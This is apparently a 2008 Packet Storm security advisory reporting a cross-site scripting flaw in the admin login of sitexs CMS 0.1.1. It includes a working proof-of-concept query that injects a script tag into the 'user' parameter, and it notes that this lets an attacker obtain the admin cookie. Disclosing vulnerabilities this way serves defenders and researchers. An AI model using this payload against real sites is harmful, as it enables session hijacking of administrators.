sitexs-xss.txt

2008-04-29T00:00:00
ID PACKETSTORM:65933
Type packetstorm
Reporter Hadi Kiamarsi
Modified 2008-04-29T00:00:00

Description

                                        
                                            `  
# Author: Hadi Kiamarsi  
# Discovered By: Hadi Kiamarsi  
# Exploited By: Hadi Kiamarsi  
  
# E-Mail: hadikiamarsi@hotmail.com  
  
# Web Site: http://ircrash.com  
  
##############################################################################  
  
# CMS: sitexs-0.1.1  
# CMS WebSite: http://sitexs.sf.net  
# Download CMS: http://heanet.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz  
  
##############################################################################  
############################### XSS ########################################  
  
# Bug :  
  
# Method: POST  
  
# Query : [sitexs]/adm/index.php?user=<script>alert(document.cookie)</script>&pass=111  
  
# The Impact Of This Vulnerability :  
  
# Attacker Can Get Admin Cookie With This Vuln ....  
  
`